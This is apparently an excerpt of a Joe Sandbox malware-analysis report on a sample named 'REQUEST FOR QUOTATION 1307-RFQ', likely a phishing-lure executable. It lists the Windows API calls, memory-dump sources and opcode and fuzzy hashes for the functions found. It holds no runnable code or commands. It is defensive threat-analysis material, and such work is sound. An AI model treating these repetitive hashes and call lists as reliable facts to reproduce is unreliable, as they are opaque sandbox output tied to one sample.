                                                                                                                                                                                                                              • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 010481258782a9ac0136f1ce20d41722eaecc78a47f1c1a55077ec376a10d582
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2294984445-0
                                                                                                                                                                                                                              • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                                                                                                                                                                              • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                                                                                                                                                                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                                                                                                                                                                                                                              • __itow.LIBCMT ref: 0045936A
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                                                                                                                                                                                                                              • __itow.LIBCMT ref: 004593A3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$__itow$_memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2983881199-0
                                                                                                                                                                                                                              • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                                                                                                                                                                              • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0040135C
                                                                                                                                                                                                                              • BeginPath.GDI32(?), ref: 00401373
                                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0040139C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3225163088-0
                                                                                                                                                                                                                              • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                                                                                                                                                                              • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                                                                                                                                                                                                                              • __beginthreadex.LIBCMT ref: 00464AD8
                                                                                                                                                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3824534824-0
                                                                                                                                                                                                                              • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                                                                                                                                                              • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000008,?,?,00B215D8,00B23CBB,?,00B21D2A,?,?,00000000), ref: 00B218E4
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B21919
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B21940
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00B21D2A,?,?,00000000), ref: 00B2194D
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00B21D2A,?,?,00000000), ref: 00B21956
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                              • Opcode ID: eaf5c2fa894a3d958d221fafc01d838ee553314058cf337efe0d0c1a094afd87
                                                                                                                                                                                                                              • Instruction ID: 06b3c16de5e7f667670cc2e723831689c4e5f9ac25d0cdf214486c63b57bafdf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eaf5c2fa894a3d958d221fafc01d838ee553314058cf337efe0d0c1a094afd87
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC01F9361006317B9321677C7C99D3B16DDDBE277572108A5F90DE3152FE728D834061
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                                                                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 842720411-0
                                                                                                                                                                                                                              • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                                                                                                                                                              • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                                                                                                                                                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3897988419-0
                                                                                                                                                                                                                              • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                                                                                                                                                              • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                                                                                                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                                                                                                                                                                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2833360925-0
                                                                                                                                                                                                                              • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                                                                                                                                                              • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 44706859-0
                                                                                                                                                                                                                              • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                                                                                                                                                                              • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 0045C226
                                                                                                                                                                                                                              • KillTimer.USER32(?,0000040A), ref: 0045C242
                                                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 0045C25C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3741023627-0
                                                                                                                                                                                                                              • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                                                                                                                                                                              • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B23189
                                                                                                                                                                                                                                • Part of subcall function 00B22096: HeapFree.KERNEL32(00000000,00000000,?,00B23208,?,00000000,?,00000000,?,00B2322F,?,00000007,?,?,00B22697,?), ref: 00B220AC
                                                                                                                                                                                                                                • Part of subcall function 00B22096: GetLastError.KERNEL32(?,?,00B23208,?,00000000,?,00000000,?,00B2322F,?,00000007,?,?,00B22697,?,?), ref: 00B220BE
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B2319B
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B231AD
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B231BF
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B231D1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: cf3ceeccb14847de80f250e5c8683ab1af023f298ac5a85f3ea2f5673943accb
                                                                                                                                                                                                                              • Instruction ID: f07f726ff763120d92c1f9cc851d82a62689586ba5962aaa1c938c7f9a367a4a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf3ceeccb14847de80f250e5c8683ab1af023f298ac5a85f3ea2f5673943accb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECF0FF36614264BB8634EBA4F986C1673E9FE05B127540889F64DE7601CA34FE90CA64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EndPath.GDI32(?), ref: 004013BF
                                                                                                                                                                                                                              • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                                                                                                                                                                                              • DeleteObject.GDI32 ref: 00401401
                                                                                                                                                                                                                              • StrokePath.GDI32(?), ref: 0040141C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
